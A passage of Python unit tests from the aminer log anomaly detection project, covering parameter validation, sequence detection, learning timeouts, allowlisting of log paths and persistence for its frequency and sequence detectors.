[self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 
learn_mode=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list="") self.assertRaises(TypeError, EventFrequencyDetector, 
self.aminer_config, [self.stream_printer_event_handler], ignore_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list={"id": "Default"}) 
self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) 
EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 
learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) def test7seasonal_frequency_detection(self): """ Test for periodically changing frequencies """ # Initialize detector for analyzing values in one path in time windows of 10 seconds t = 0 expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n /value: %s\n%s\n\n' dtf = "%Y-%m-%d %H:%M:%S" efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=['/value'], window_size=10, num_windows=100, 
confidence_factor=0.51, empty_window_warnings=True, persistence_id='Default', learn_mode=True, output_logline=True, season=20) # Windows have 1 and 2 atoms alternatingly; the season is thus 2 and expected atom frequencies can be predicted exactly. # The anomaly is that in window 6, only 1 atom occurs although 2 should occur following the sequence. # The anomaly is reported by the log atom in window 7 that concludes window 6. # The following log atoms are created: # window 1: # value a: 1 times # window 2: # value a: 2 time # window 3: # value a: 1 time # window 4: # value a: 2 times # window 5: # value a: 1 time # window 6: # value a: 1 time # window 7: # value a: 1 time m_1 = MatchElement('/value', b'a', b'a', None) parser_match_1 = ParserMatch(m_1) log_atom_1 = LogAtom(b'a', parser_match_1, 1, None) m_2 = MatchElement('/value', b'a', b'a', None) parser_match_2 = ParserMatch(m_2) log_atom_2 = LogAtom(b'a', parser_match_2, 15, None) m_3 = MatchElement('/value', b'a', b'a', None) parser_match_3 = ParserMatch(m_3) log_atom_3 = LogAtom(b'a', parser_match_3, 16, None) m_4 = MatchElement('/value', b'a', b'a', None) parser_match_4 = ParserMatch(m_4) log_atom_4 = LogAtom(b'a', parser_match_4, 25, None) m_6 = MatchElement('/value', b'a', b'a', None) parser_match_6 = ParserMatch(m_6) log_atom_6 = LogAtom(b'a', parser_match_6, 35, None) m_7 = MatchElement('/value', b'a', b'a', None) parser_match_7 = ParserMatch(m_7) log_atom_7 = LogAtom(b'a', parser_match_7, 36, None) m_8 = MatchElement('/value', b'a', b'a', None) parser_match_8 = ParserMatch(m_8) log_atom_8 = LogAtom(b'a', parser_match_8, 45, None) m_9 = MatchElement('/value', b'a', b'a', None) parser_match_9 = ParserMatch(m_9) log_atom_9 = LogAtom(b'a', parser_match_9, 55, None) m_10 = MatchElement('/value', b'a', b'a', None) parser_match_10 = ParserMatch(m_10) log_atom_10 = LogAtom(b'a', parser_match_10, 65, None) efd.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_2) 
self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_3) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_4) # Delete anomaly that occurs since second window has 2 but first only 1 atoms. self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+25).strftime(dtf), efd.__class__.__name__, 1, "a", "a")) self.reset_output_stream() efd.receive_atom(log_atom_6) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_7) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_8) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_9) self.assertEqual(self.output_stream.getvalue(), "") efd.receive_atom(log_atom_10) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+65).strftime(dtf), efd.__class__.__name__, 1, "a", "a")) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventSequenceDetectorTest.py000066400000000000000000001024211500476301700312610ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EventSequenceDetector import EventSequenceDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventSequenceDetectorTest(TestBase): """Unittests for the EventSequenceDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new sequences. The ESD is used to detect value sequences of length 2 and uses one id path to cope with interleaving sequences, i.e., the sequences only make sense when logs that contain the same id are considered. 
Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # Initialize detector for sequence length 2 t = time.time() expected_string = '%s New sequence detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # Prepare log atoms that represent two users (id) that produce interleaved sequence a, b, c # This means, user with id 1 creates sequence a, b, c, and user with id 2 creates sequence # a, b, however, these sequences are interleaved. The ESD resolves this issue using the id # as an id path (/model/id). The path of the values is /model/value. # The following events are generated: # id: 1 value: a # id: 1 value: b # id: 2 value: a # id: 1 value: c # id: 2 value: b m1 = MatchElement("/model/id", b"1", b"1", None) m2 = MatchElement("/model/value", b"a", b"a", None) log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t+1, None) m4 = MatchElement("/model/value", b"b", b"b", None) log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t+2, None) m5 = MatchElement("/model/id", b"2", b"2", None) m6 = MatchElement("/model/value", b"a", b"a", None) log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t+3, None) m7 = MatchElement("/model/id", b"1", b"1", None) m8 = MatchElement("/model/value", b"c", b"c", None) log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t+4, None) m9 = MatchElement("/model/id", b"2", b"2", None) m10 = MatchElement("/model/value", b"b", b"b", None) log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t+5, None) esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], seq_len=2, learn_mode=True, output_logline=False) esd.receive_atom(log_atom1) 
self.assertEqual(self.output_stream.getvalue(), "") sequences_set = set() self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), esd.__class__.__name__, 1, "1c")) self.reset_output_stream() sequences_set.add((("/model", "/model/id", "/model/value"), ("/model", "/model/id", "/model/value"))) self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) # target_path_list esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True, output_logline=False) # Forward log atoms to detector # Since sequence length is 2, first atom should not have any effect # Input: id: 1 value: a # Expected output: None esd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") sequences_set = set() self.assertEqual(esd.sequences, sequences_set) # Second log atom should create first sequence # Input: id: 1 value: b # Expected output: New sequence (a, b) detected, added to known sequences esd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) # Next log atom is of different user, should not have any effect # Input: id: 2 value: a # Expected output: None esd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) # Next log atom is of user with id 1, but new value c, thus new sequence should be generated # Input: id: 1 value: c # 
Expected output: New sequence (b, c) detected, added to known sequences esd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), esd.__class__.__name__, 1, "1c")) self.reset_output_stream() sequences_set.add((("a",), ("c",))) self.assertEqual(esd.sequences, sequences_set) # Next log atom is of user with id 2, but sequence a, b is already known from user with id 1, thus no effect # Input: id: 2 value: b # Expected output: None esd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), esd.__class__.__name__, 1, "2b")) self.reset_output_stream() sequences_set.add((("a",), ("b",))) self.assertEqual(esd.sequences, sequences_set) # allow_missing_id=True esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], seq_len=2, learn_mode=True, output_logline=False, allow_missing_id=True) esd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") sequences_set = set() self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), esd.__class__.__name__, 1, "1c")) self.reset_output_stream() sequences_set.add((("a",), ("c",))) self.assertEqual(esd.sequences, sequences_set) esd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), esd.__class__.__name__, 1, "2b")) self.reset_output_stream() sequences_set.add((("a",), ("b",))) self.assertEqual(esd.sequences, 
sequences_set)

        # stop_learning_time: with learn_mode=True the detector keeps learning until the configured
        # absolute learning window (100 s here) has passed; the assertions below pin that learn_mode is
        # still on at t + 99 and off once an atom at t + 102 has been received.
        esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"],
                                    target_path_list=["/model/value"], seq_len=2, learn_mode=True, allow_missing_id=True,
                                    stop_learning_time=100)
        self.assertTrue(esd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(esd.receive_atom(log_atom1))
        self.assertTrue(esd.learn_mode)
        log_atom1.atom_time = t + 102
        self.assertTrue(esd.receive_atom(log_atom1))
        self.assertFalse(esd.learn_mode)

        # stop_learning_no_anomaly_time: learning stops only after 100 s without an anomaly. The atom at
        # t + 100 is an anomaly (a new sequence), which keeps learn_mode on; the atom at t + 201 arrives
        # more than 100 s after the last anomaly and switches learn_mode off.
        esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"],
                                    target_path_list=["/model/value"], seq_len=2, learn_mode=True, allow_missing_id=True,
                                    stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(esd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(esd.receive_atom(log_atom1))
        self.assertTrue(esd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(esd.receive_atom(log_atom2))
        self.assertTrue(esd.learn_mode)
        log_atom1.atom_time = t + 200
        # NOTE(review): the time is advanced on log_atom1 but log_atom3 is the atom received here, so
        # log_atom3 still carries its original atom_time — presumably intended; confirm against the
        # detector's no-anomaly timer before relying on this step.
        self.assertTrue(esd.receive_atom(log_atom3))
        self.assertTrue(esd.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(esd.receive_atom(log_atom1))
        self.assertFalse(esd.learn_mode)

    def test2do_timer(self):
        """Test if the do_timer method is implemented properly.

        do_timer(now) is expected to return the number of seconds until next_persist_time while that
        time lies in the future. Once next_persist_time is reached the returned value is
        DEFAULT_PERSISTENCE_PERIOD and the following calls count down from the new persist time.
        """
        esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler])
        t = time.time()
        esd.next_persist_time = t + 400
        self.assertEqual(esd.do_timer(t + 200), 200)
        self.assertEqual(esd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        # t + 999 yields 1, so the persist time moved to t + 1000 after the call at t + 400.
        self.assertEqual(esd.do_timer(t + 999), 1)
        self.assertEqual(esd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """Test if the allowlist_event method is implemented properly.

        Allowlisting a path appends it to constraint_list and returns a confirmation message;
        events of another detector class and non-empty allowlisting data must be rejected.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler])
        analysis = "Analysis.%s"
        self.assertRaises(Exception, esd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)

        # The EventSequenceDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, esd.allowlist_event, analysis % esd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])

        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(esd.allowlist_event(analysis % esd.__class__.__name__, "/s1", None),
                         "Allowlisted path %s in %s." % ("/s1", analysis % esd.__class__.__name__))
        self.assertEqual(esd.constraint_list, ["/s1"])

        # Allowlisting must also work while learn_mode is off; the new path is appended, not replaced.
        esd.learn_mode = False
        self.assertEqual(esd.allowlist_event(analysis % esd.__class__.__name__, "/d1", None),
                         "Allowlisted path %s in %s." % ("/d1", analysis % esd.__class__.__name__))
        self.assertEqual(esd.constraint_list, ["/s1", "/d1"])

    def test4blocklist_event(self):
        """Test if the blocklist_event method is implemented properly.

        Blocklisting a path appends it to ignore_list and returns a confirmation message;
        events of another detector class and non-empty blocklisting data must be rejected.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler])
        analysis = "Analysis.%s"
        self.assertRaises(Exception, esd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)

        # The EventSequenceDetector can not handle blocklisting data and therefore an exception is expected.
        self.assertRaises(Exception, esd.blocklist_event, analysis % esd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])

        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/s1", None),
                         "Blocklisted path %s in %s." % ("/s1", analysis % esd.__class__.__name__))
        self.assertEqual(esd.ignore_list, ["/s1"])

        # Blocklisting must also work while learn_mode is off; the new path is appended, not replaced.
        esd.learn_mode = False
        self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/d1", None),
                         "Blocklisted path %s in %s." % ("/d1", analysis % esd.__class__.__name__))
        self.assertEqual(esd.ignore_list, ["/s1", "/d1"])

    def test5persistence(self):
        """Test the do_persist and load_persistence_data methods.

        Learned sequences are written to persistence_file_name as JSON, read back into the same
        detector, and picked up by a freshly constructed detector with the same persistence settings.
        """
        t = time.time()
        esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"],
                                    target_path_list=["/model/value"], seq_len=2, learn_mode=True)
        m1 = MatchElement("/model/id", b"1", b"1", None)
        m2 = MatchElement("/model/value", b"a", b"a", None)
        log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t + 1, None)
        # log_atom2 carries no /model/id element; with the default allow_missing_id it is not attributed to
        # any id, which is why only (a, c) for id 1 and (a, b) for id 2 show up in the expected set below.
        m4 = MatchElement("/model/value", b"b", b"b", None)
        log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t + 2, None)
        m5 = MatchElement("/model/id", b"2", b"2", None)
        m6 = MatchElement("/model/value", b"a", b"a", None)
        log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t + 3, None)
        m7 = MatchElement("/model/id", b"1", b"1", None)
        m8 = MatchElement("/model/value", b"c", b"c", None)
        log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t + 4, None)
        m9 = MatchElement("/model/id", b"2", b"2", None)
        m10 = MatchElement("/model/value", b"b", b"b", None)
        log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t + 5, None)
        esd.receive_atom(log_atom1)
        esd.receive_atom(log_atom2)
        esd.receive_atom(log_atom3)
        esd.receive_atom(log_atom4)
        esd.receive_atom(log_atom5)
        esd.do_persist()
        # The on-disk format is checked verbatim: tuples become JSON lists and strings get a "string:" tag.
        with open(esd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[[["string:a"], ["string:b"]], [["string:a"], ["string:c"]]]')
        self.assertEqual(esd.sequences, {(("a",), ("b",)), (("a",), ("c",))})
        # Clearing the in-memory state and reloading must reconstruct the original tuple-of-tuples set.
        esd.sequences = set()
        esd.load_persistence_data()
        self.assertEqual(esd.sequences, {(("a",), ("b",)), (("a",), ("c",))})

        # A second detector with identical settings loads the same persisted sequences at construction.
        other = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"],
                                      target_path_list=["/model/value"], seq_len=2, learn_mode=True)
        self.assertEqual(other.sequences, esd.sequences)

    def test6validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class.

        Pattern used throughout: a value of the wrong type raises TypeError; a value of the right type but
        outside the accepted range (empty path strings, non-positive lengths and timeouts, an empty
        persistence_id, both stop_learning_* options at once, a resource path that is not a URI) raises
        ValueError; accepted values construct without error.
        """
        # anomaly_event_handlers: must be a list of handlers.
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, ["default"])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, None)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, "")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, True)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, 123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, 123.3)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, {"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, ())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, set())

        # id_path_list: list of non-empty path strings; [] and None are accepted.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=[""])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list="")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=True)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123.3)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=())
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=set())
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=[])
        EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=None)

        # target_path_list: same rules as id_path_list.
        self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""])
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=b"Default")
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.3)
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"})
        self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=())
